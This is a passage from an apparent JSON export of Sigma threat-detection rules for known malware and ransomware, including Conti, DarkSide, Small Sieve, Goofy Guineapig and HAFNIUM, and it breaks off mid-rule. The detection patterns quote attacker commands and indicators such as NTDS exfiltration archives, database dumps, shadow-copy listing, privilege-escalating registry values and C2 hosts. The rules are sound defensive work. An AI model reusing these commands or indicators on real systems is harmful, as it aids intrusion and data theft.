    "content": "title: Blackbyte Ransomware Registry\nid: 83314318-052a-4c90-a1ad-660ece38d276\nstatus: test\ndescription: |\n    Detects specific Windows registry modifications made by BlackByte ransomware variants.\n    BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.\n    This rule triggers when any of the following registry keys are set to DWORD 1; however, all three should be investigated as part of a larger BlackByte ransomware detection and response effort.\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\nauthor: frack113\ndate: 2022-01-24\nmodified: 2025-10-21\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject:\n            - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy'\n            - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections'\n            - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem\\LongPathsEnabled'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml",
    "content": "title: Conti Volume Shadow Listing\nid: 7b30e0a7-c675-4b24-8a46-82fa67e2433d\nstatus: test\ndescription: Detects a command used by Conti to find volume shadow backups\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\ntags:\n    - attack.t1587.001\n    - attack.resource-development\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'vssadmin list shadows'\n            - 'log.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml",
    "content": "title: Conti NTDS Exfiltration Command\nid: aa92fd02-09f2-48b0-8a93-864813fb8f41\nstatus: test\ndescription: Detects a command used by Conti to exfiltrate NTDS\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1560\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '7za.exe'\n            - '\\\\C$\\\\temp\\\\log.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml",
    "content": "title: Potential Conti Ransomware Activity\nid: 689308fc-cfba-4f72-9897-796c1dc61487\nstatus: test\ndescription: Detects a specific command used by the Conti ransomware group\nreferences:\n    - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/\n    - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19\nauthor: frack113\ndate: 2021-10-12\nmodified: 2023-02-13\ntags:\n    - attack.impact\n    - attack.s0575\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-m '\n            - '-net '\n            - '-size ' # Size 10 in references\n            - '-nomutex '\n            - '-p \\\\\\\\'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml",
    "content": "title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd\nid: 2f47f1fd-0901-466e-a770-3b7092834a1b\nstatus: test\ndescription: Detects a command used by Conti to dump a database\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info, not the files themselves\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15\nauthor: frack113\ndate: 2021-08-16\nmodified: 2023-05-04\ntags:\n    - attack.collection\n    - attack.t1005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        - Image|endswith: '\\sqlcmd.exe'\n        - CommandLine|contains:\n              - 'sqlcmd '\n              - 'sqlcmd.exe'\n    selection_svr:\n        CommandLine|contains: ' -S localhost '\n    selection_query:\n        CommandLine|contains:\n            - 'sys.sysprocesses'\n            - 'master.dbo.sysdatabases'\n            - 'BACKUP DATABASE'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml",
    "content": "title: DarkSide Ransomware Pattern\nid: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c\nstatus: test\ndescription: Detects DarkSide Ransomware and helpers\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\n    - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/\n    - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\ntags:\n    - attack.execution\n    - attack.t1204\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - '=[char][byte](''0x''+'\n            - ' -work worker0 -path '\n    selection2:\n        ParentCommandLine|contains: 'DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\n    - UAC bypass method used by other malware\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/README.md",
    "content": "# Devil Bait\n\n## Summary\n\nDevil Bait is a malicious macro-enabled Microsoft Word document targeting Korean speakers, which downloads and runs a second-stage VBScript. Both stages use ‘live off the land’ binaries (‘LOLbins’) to achieve execution, system enumeration, registry modification and persistence.\n\nYou can find more information on the threat in the following articles:\n\n- [Devil Bait - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf)\n\n## Rules\n\n- [Potential Devil Bait Related Indicator](./file_event_win_malware_devil_bait_script_drop.yml)\n- [Potential Devil Bait Malware Reconnaissance](./proc_creation_win_malware_devil_bait_output_redirect.yml)\n- [Devil Bait Potential C2 Communication Traffic](./proxy_malware_devil_bait_c2_communication.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml",
    "content": "title: Potential Devil Bait Related Indicator\nid: 93d5f1b4-36df-45ed-8680-f66f242b8415\nstatus: test\ndescription: Detects the creation of \".xml\" and \".txt\" files in folders of the \"\\AppData\\Roaming\\Microsoft\" directory by uncommon processes. This behavior was commonly seen across different Devil Bait samples and stages as described by the NCSC\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\wscript.exe'\n            - '\\mshta.exe'\n        # Example folders used by the samples include:\n        #   - %AppData%\\Microsoft\\Network\\\n        #   - %AppData%\\Microsoft\\Office\\\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\'\n        TargetFilename|endswith:\n            - '.txt'\n            - '.xml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml",
    "content": "title: Potential Devil Bait Malware Reconnaissance\nid: e8954be4-b2b8-4961-be18-da1a5bda709c\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: derived\nstatus: test\ndescription: Detects specific process behavior observed with Devil Bait samples\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\n    - https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)\ndate: 2023-05-15\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_redirect:\n        ParentImage|endswith: '\\wscript.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '>>%APPDATA%\\Microsoft\\'\n        CommandLine|endswith:\n            - '.xml'\n            - '.txt'\n    selection_recon_cmd:\n        - CommandLine|re: 'ipconfig\\s+/all'\n        - CommandLine|contains:\n              # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504\n              # If you find samples using other commands please add them\n              - 'dir'\n              - 'systeminfo'\n              - 'tasklist'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/proxy_malware_devil_bait_c2_communication.yml",
    "content": "title: Devil Bait Potential C2 Communication Traffic\nid: 514c50c9-373a-46e5-9012-f0327c526c8f\nstatus: test\ndescription: Detects potential C2 communication related to Devil Bait malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-08-23\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains|all:\n            - '/cross.php?op='\n            - '&dt='\n            - '&uid='\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml",
    "content": "title: FoggyWeb Backdoor DLL Loading\nid: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c\nstatus: test\ndescription: Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected \"version.dll\" DLL\nreferences:\n    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-27\nmodified: 2022-12-09\ntags:\n    - attack.resource-development\n    - attack.t1587\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded: 'C:\\Windows\\ADFS\\version.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/README.md",
    "content": "# Goofy Guineapig\n\n## Summary\n\nGoofy Guineapig is a persistent backdoor used to collect and exfiltrate system information and load additional plugins.\n\nYou can find more information on the threat in the following articles:\n\n- [Goofy Guineapig - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf)\n\n## Rules\n\n- [Goofy Guineapig Backdoor IOC](./file_event_win_malware_goofy_guineapig_file_indicators.yml)\n- [Potential Goofy Guineapig Backdoor Activity](./proc_creation_win_malware_goofy_guineapig_broken_cmd.yml)\n- [Potential Goofy Guineapig GoogleUpdate Process Anomaly](./proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml)\n- [Goofy Guineapig Backdoor Potential C2 Communication](./proxy_malware_goofy_gunieapig_c2_communication.yml)\n- [Goofy Guineapig Backdoor Service Creation](./win_system_malware_goofy_guineapig_service_persistence.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/file_event_win_malware_goofy_guineapig_file_indicators.yml",
    "content": "title: Goofy Guineapig Backdoor IOC\nid: f0bafe60-1240-4798-9e60-4364b97e6bad\nstatus: test\ndescription: Detects malicious indicators seen used by the Goofy Guineapig malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename:\n            - 'C:\\ProgramData\\GoogleUpdate\\config.dat'\n            - 'C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe'\n            - 'C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat'\n            - 'C:\\ProgramData\\GoogleUpdate\\goopdate.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml",
    "content": "title: Potential Goofy Guineapig Backdoor Activity\nid: 477a5ed3-a374-4282-9f3b-ed94e159a108\nstatus: test\ndescription: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'choice /t %d /d y /n >nul'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml",
    "content": "title: Potential Goofy Guineapig GoogleUpdate Process Anomaly\nid: bdbab15a-3826-48fa-a1b7-723cd8f32fcc\nstatus: test\ndescription: Detects \"GoogleUpdate.exe\" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\GoogleUpdate.exe'\n        Image|endswith: '\\GoogleUpdate.exe'\n    filter_main_legit_paths:\n        - Image|startswith:\n              - 'C:\\Program Files\\Google\\'\n              - 'C:\\Program Files (x86)\\Google\\'\n        - Image|contains: '\\AppData\\Local\\Google\\Update\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proxy_malware_goofy_gunieapig_c2_communication.yml",
    "content": "title: Goofy Guineapig Backdoor Potential C2 Communication\nid: 4f573bb6-701a-4b8d-91db-87ae106e9a61\nstatus: test\ndescription: Detects potential C2 communication related to Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'\n        cs-host: 'static.tcplog.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml",
    "content": "title: Goofy Guineapig Backdoor Service Creation\nid: 8c15dd74-9570-4f48-80b2-29996fd91ee6\nstatus: test\ndescription: Detects service creation persistence used by the Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'GoogleUpdate'\n        ImagePath|contains|all:\n            - 'rundll32'\n            - 'FileProtocolHandler'\n            - '\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml",
    "content": "title: Moriya Rootkit File Created\nid: a1507d71-0b60-44f6-b17c-bf53220fdd88\nrelated:\n    - id: 25b9c01c-350d-4b95-bed1-836d04a4f324\n      type: derived\nstatus: test\ndescription: Detects the creation of a file named \"MoriyaStreamWatchmen.sys\" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.\nreferences:\n    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nauthor: Bhabesh Raj\ndate: 2021-05-06\nmodified: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Netwire/registry_add_malware_netwire.yml",
    "content": "title: Potential NetWire RAT Activity - Registry\nid: 1d218616-71b0-4c40-855b-9dbe75510f7f\nstatus: test\ndescription: Detects registry keys related to NetWire RAT\nreferences:\n    - https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing\n    - https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/\n    - https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/\n    - https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line\n    - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/\nauthor: Christopher Peacock\ndate: 2021-10-07\nmodified: 2025-11-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        # The configuration information is usually stored under HKCU:\\Software\\Netwire - RedCanary\n        TargetObject|contains: '\\software\\NetWire'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor File Indicators\nid: 2bd63d53-84d4-4210-80ff-bf0658f1bf78\nrelated:\n    - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load\n      type: similar\n    - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: 'updata.exe'\n        TargetFilename: 'C:\\Windows\\oci.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor DLL Loading Activity\nid: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b\nrelated:\n    - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File indicators\n      type: similar\n    - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\msdtc.exe'\n        ImageLoaded: 'C:\\Windows\\oci.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor Activity\nid: b2400ffb-7680-47c0-b08a-098a7de7e7a9\nrelated:\n    - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load\n      type: similar\n    - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\updata.exe'\n        CommandLine|contains|all:\n            - 'config'\n            - 'msdtc'\n            - 'start'\n            - 'auto'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/README.md",
    "content": "# Small-Sieve\n\n## Summary\n\nSmall Sieve is a simple – possibly disposable – Python backdoor which is distributed using an NSIS installer that performs persistence. It provides basic functionality required to maintain and expand a foothold in victim infrastructure using custom string and traffic obfuscation schemes together with the Telegram Bot API to avoid detection.\n\nYou can find more information on the threat in the following articles:\n\n- [Small Sieve - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf)\n\n## Rules\n\n- [Small Sieve Malware File Indicator Creation](./file_event_win_malware_small_sieve_evasion_typo.yml)\n- [Small Sieve Malware CommandLine Indicator](./proc_creation_win_malware_small_sieve_cli_arg.yml)\n- [Small Sieve Malware Potential C2 Communication](./proxy_malware_small_sieve_telegram_communication.yml)\n- [Small Sieve Malware Registry Persistence](./registry_set_malware_small_sieve_evasion_typo.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml",
    "content": "title: Small Sieve Malware File Indicator Creation\nid: 39466c42-c189-476a-989f-8cdb135c163a\nstatus: test\ndescription: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_typo_path:\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\'\n        TargetFilename|contains:\n            - '\\Roaming\\'\n            - '\\Local\\'\n    selection_typo_keyword:\n        TargetFilename|contains: 'Microsift'\n    selection_ioc:\n        TargetFilename|endswith: '\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt'\n    condition: all of selection_typo_* or selection_ioc\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml",
    "content": "title: Small Sieve Malware CommandLine Indicator\nid: 21117127-21c8-437a-ae03-4b51e5a8a088\nstatus: test\ndescription: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|endswith: '.exe Platypus'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/proxy_malware_small_sieve_telegram_communication.yml",
    "content": "title: Small Sieve Malware Potential C2 Communication\nid: b0422664-37a4-4e78-949a-4a139309eaf0\nstatus: test\ndescription: Detects potential C2 communication related to Small Sieve malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-host: 'api.telegram.org'\n        cs-uri|contains|all:\n            - 'chat_id=2090761833'\n            - 'text=com/'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml",
    "content": "title: Small Sieve Malware Registry Persistence\nid: 65c6e3c1-fb28-4c03-a51e-84919d8185f1\nstatus: test\ndescription: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_path:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n    selection_value:\n        - TargetObject|contains: 'Microsift'\n        - Details|contains: '.exe Platypus'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml",
    "content": "title: HAFNIUM Exchange Exploitation Activity\nid: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7\nstatus: test\ndescription: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers\nreferences:\n    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\n    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20\n    - https://twitter.com/BleepinComputer/status/1372218235949617161\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-09\nmodified: 2023-03-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1546\n    - attack.t1053\n    - attack.g0125\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_attrib:\n        CommandLine|contains|all:\n            - 'attrib'\n            - ' +h '\n            - ' +s '\n            - ' +r '\n            - '.aspx'\n    selection_vsperfmon:\n        - Image|contains: '\\ProgramData\\VSPerfMon\\'\n        - CommandLine|contains|all:\n              - 'schtasks'\n              - 'VSPerfMon'\n    